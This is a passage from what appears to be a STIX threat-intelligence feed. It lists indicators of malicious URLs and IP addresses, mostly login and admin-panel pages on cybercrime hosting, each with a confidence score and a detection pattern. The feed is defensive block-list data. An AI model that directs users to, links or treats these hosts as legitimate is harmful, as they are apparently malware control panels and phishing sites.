CyberCrime","id":"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-08T14:02:23Z","name":"mal_url: http://go.trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://go.trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:02:23Z"} +{"created":"2020-02-08T14:02:23.507Z","description":"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-08T14:02:23.507Z","name":"mal_url: http://178.62.186.112/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.186.112/login']","type":"indicator","valid_from":"2020-02-08T14:02:23.507Z"} +{"created":"2020-02-08T14:02:23.547Z","description":"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:02:23.547Z","name":"mal_ip: 5.188.231.89","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.231.89']","type":"indicator","valid_from":"2020-02-08T14:02:23.547Z"} +{"created":"2020-02-08T14:02:33.679Z","description":"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-08T14:02:33.679Z","name":"mal_url: http://f0391897.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391897.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:33.679Z"} +{"created":"2020-02-08T14:02:53.996Z","description":"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-08T14:02:53.996Z","name":"mal_ip: 190.14.38.202","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.14.38.202']","type":"indicator","valid_from":"2020-02-08T14:02:53.996Z"} +{"created":"2020-02-08T14:02:57.507Z","description":"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--46c21251-c655-40c1-896d-2f4712091b7b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-08T14:02:57.507Z","name":"mal_url: http://nikitakoteqka1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nikitakoteqka1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:57.507Z"} +{"created":"2020-02-08T14:02:59.236Z","description":"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--7921e9e8-393c-4b0d-888f-bea034112f06","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:02:59.236Z","name":"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:02:59.236Z"} +{"created":"2020-02-08T14:02:59.246Z","description":"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:02:59.246Z","name":"mal_url: http://100stuff.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://100stuff.site/login']","type":"indicator","valid_from":"2020-02-08T14:02:59.246Z"} +{"created":"2020-02-08T14:02:59.31Z","description":"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:02:59.31Z","name":"mal_ip: 81.4.100.75","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.4.100.75']","type":"indicator","valid_from":"2020-02-08T14:02:59.31Z"} +{"created":"2020-02-08T14:02:59.432Z","description":"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-08T14:02:59.432Z","name":"mal_ip: 8.209.78.16","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.209.78.16']","type":"indicator","valid_from":"2020-02-08T14:02:59.432Z"} +{"created":"2020-02-08T14:03:17.953Z","description":"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-08T14:03:17.953Z","name":"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:17.953Z"} +{"created":"2020-02-08T14:03:21.626Z","description":"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:03:21.626Z","name":"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:21.626Z"} +{"created":"2020-02-08T14:03:23.941Z","description":"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime","id":"indicator--be5fb697-b554-4042-8185-f4148a5d02a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-08T14:03:23.941Z","name":"mal_url: http://boomcoins.ml/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://boomcoins.ml/login']","type":"indicator","valid_from":"2020-02-08T14:03:23.941Z"} +{"created":"2020-02-08T14:03:34.136Z","description":"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:03:34.136Z","name":"mal_url: http://asstubevideos.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://asstubevideos.com/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.136Z"} +{"created":"2020-02-08T14:03:34.507Z","description":"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-08T14:03:34.507Z","name":"mal_url: http://f0397413.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0397413.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.507Z"} +{"created":"2020-02-08T14:03:42.075Z","description":"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:42.075Z","name":"mal_ip: 45.145.0.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.145.0.14']","type":"indicator","valid_from":"2020-02-08T14:03:42.075Z"} +{"created":"2020-02-08T14:03:42.298Z","description":"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-08T14:03:42.298Z","name":"mal_url: http://f0396512.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396512.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:42.298Z"} +{"created":"2020-02-08T14:03:46.901Z","description":"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-08T14:03:46.901Z","name":"mal_url: http://j1043204.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1043204.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:46.901Z"} +{"created":"2020-02-08T14:03:47.108Z","description":"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-08T14:03:47.108Z","name":"mal_url: http://f0387320.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387320.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:47.108Z"} +{"created":"2020-02-08T14:03:50.674Z","description":"TS ID: 55298072749; iType: mal_url; State: active; Org: SpaceWeb CJSC; Source: CyberCrime","id":"indicator--48ad83a8-cec1-4d85-a9fd-1b7f9308cb6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-08T14:03:50.674Z","name":"mal_url: http://rqx10504bc.temp.swtest.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rqx10504bc.temp.swtest.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:03:50.674Z"} +{"created":"2020-02-08T14:03:53.621Z","description":"TS ID: 55298069555; iType: mal_url; State: active; Org: OOO Network of data-centers Selectel; Source: CyberCrime","id":"indicator--8e98212b-20f2-404f-804b-8ab7519c5683","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-08T14:03:53.621Z","name":"mal_url: http://j6g3fzp.5k5.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j6g3fzp.5k5.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:03:53.621Z"} +{"created":"2020-02-08T14:03:58.176Z","description":"TS ID: 55298069681; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--395e83ba-96c1-45d2-b4b2-c065af5547fe","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:58.176Z","name":"mal_url: http://stableupdater.ru.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://stableupdater.ru.com/login']","type":"indicator","valid_from":"2020-02-08T14:03:58.176Z"} +{"created":"2020-02-08T14:03:58.41Z","description":"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime","id":"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-02-08T14:03:58.41Z","name":"mal_url: http://209.182.217.85/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://209.182.217.85/auth.php']","type":"indicator","valid_from":"2020-02-08T14:03:58.41Z"} +{"created":"2020-02-08T14:04:30.627Z","description":"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.627Z","name":"mal_url: http://fentq.org/x/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fentq.org/x/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.627Z"} +{"created":"2020-02-08T14:04:30.659Z","description":"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-08T14:04:30.659Z","name":"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.659Z"} +{"created":"2020-02-08T14:04:30.733Z","description":"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--7873494f-24fb-42a6-ae17-299b9825e220","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:04:30.733Z","name":"mal_ip: 162.241.6.97","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.6.97']","type":"indicator","valid_from":"2020-02-08T14:04:30.733Z"} +{"created":"2020-02-08T14:04:30.81Z","description":"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-08T14:04:30.81Z","name":"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.81Z"} +{"created":"2020-02-08T14:04:30.84Z","description":"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.84Z","name":"mal_url: http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.84Z"} +{"created":"2020-02-08T14:04:30.927Z","description":"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:04:30.927Z","name":"mal_url: http://45.145.0.14/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.145.0.14/login']","type":"indicator","valid_from":"2020-02-08T14:04:30.927Z"} +{"created":"2020-02-08T14:04:35.541Z","description":"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:04:35.541Z","name":"mal_url: http://trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:04:35.541Z"} +{"created":"2020-02-08T14:04:35.641Z","description":"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-08T14:04:35.641Z","name":"mal_ip: 217.8.117.66","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.66']","type":"indicator","valid_from":"2020-02-08T14:04:35.641Z"} +{"created":"2020-02-08T14:04:37.657Z","description":"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d2987902-59e6-4667-b011-f20e93e283d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:04:37.657Z","name":"mal_url: http://81.4.100.75/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://81.4.100.75/login']","type":"indicator","valid_from":"2020-02-08T14:04:37.657Z"} +{"created":"2020-02-08T14:04:41.785Z","description":"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-08T14:04:41.785Z","name":"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:41.785Z"} +{"created":"2020-02-08T14:04:43.759Z","description":"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:04:43.759Z","name":"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:43.759Z"} +{"created":"2020-02-08T14:04:43.783Z","description":"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-08T14:04:43.783Z","name":"mal_url: http://kmfjlool.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kmfjlool.xyz/login']","type":"indicator","valid_from":"2020-02-08T14:04:43.783Z"} +{"created":"2020-02-09T05:09:33.689Z","description":"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-09T05:09:33.689Z","name":"mal_ip: 147.139.139.206","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '147.139.139.206']","type":"indicator","valid_from":"2020-02-09T05:09:33.689Z"} +{"created":"2020-02-10T02:01:30.459Z","description":"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--07925c70-b345-4aa6-8f40-e19602cf0429","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:01:30.459Z","name":"mal_url: http://pentestblog.xyz/panel/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pentestblog.xyz/panel/login/']","type":"indicator","valid_from":"2020-02-10T02:01:30.459Z"} +{"created":"2020-02-10T02:01:36.571Z","description":"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--00195f28-4745-41a3-9710-7e2266b1270e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-10T02:01:36.571Z","name":"mal_url: http://f0386817.xsph.ru/32cd6120/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']","type":"indicator","valid_from":"2020-02-10T02:01:36.571Z"} +{"created":"2020-02-10T02:01:36.621Z","description":"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:01:36.621Z","name":"mal_url: http://f0395086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0395086.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:01:36.621Z"} +{"created":"2020-02-10T02:02:06.427Z","description":"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:06.427Z","name":"mal_url: http://45.76.237.80/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.76.237.80/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:06.427Z"} +{"created":"2020-02-10T02:02:14.887Z","description":"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-10T02:02:14.887Z","name":"mal_url: http://worldatdoor.in/wire/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:14.887Z"} +{"created":"2020-02-10T02:02:16.263Z","description":"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-10T02:02:16.263Z","name":"mal_url: http://wwe23pro.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wwe23pro.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-10T02:02:16.263Z"} +{"created":"2020-02-10T02:02:35.848Z","description":"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:35.848Z","name":"mal_ip: 2.59.117.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.59.117.6']","type":"indicator","valid_from":"2020-02-10T02:02:35.848Z"} +{"created":"2020-02-10T02:02:45.419Z","description":"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-02-10T02:02:45.419Z","name":"mal_url: http://garex.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://garex.xyz/login']","type":"indicator","valid_from":"2020-02-10T02:02:45.419Z"} +{"created":"2020-02-10T02:02:47.096Z","description":"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--05509090-9cd9-43b0-892c-02318134a893","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-10T02:02:47.096Z","name":"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:47.096Z"} +{"created":"2020-02-10T02:02:55.786Z","description":"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c884bffa-1248-483b-bdf8-dada05340ea4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-10T02:02:55.786Z","name":"mal_url: http://f0396079.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396079.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:02:55.786Z"} +{"created":"2020-02-10T02:03:03.62Z","description":"TS ID: 55303483931; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--14bb6b9e-e4f9-4059-a1a0-f06481441883","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:03:03.62Z","name":"mal_url: http://impulsefittness.info/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://impulsefittness.info/webpanel/login.php']","type":"indicator","valid_from":"2020-02-10T02:03:03.62Z"} +{"created":"2020-02-10T02:03:53.711Z","description":"TS ID: 55303483865; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--92bdd0d7-0d15-4bcb-bf37-6aec2b0114b8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:03:53.711Z","name":"mal_url: http://pentestblog.xyz/csc/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pentestblog.xyz/csc/index.php']","type":"indicator","valid_from":"2020-02-10T02:03:53.711Z"} +{"created":"2020-02-10T02:03:57.56Z","description":"TS ID: 55303483938; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--eb0c4603-82ac-4283-bda3-ce9d276bc002","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:03:57.56Z","name":"mal_url: http://pom4ekk.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pom4ekk.myjino.ru/login']","type":"indicator","valid_from":"2020-02-10T02:03:57.56Z"} +{"created":"2020-02-10T02:04:24.419Z","description":"TS ID: 55303483870; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--14393248-efcc-4446-9c71-c24b8ea653ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:04:24.419Z","name":"mal_url: http://f0396384.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396384.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:04:24.419Z"} +{"created":"2020-02-10T02:04:39.273Z","description":"TS ID: 55303483883; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: 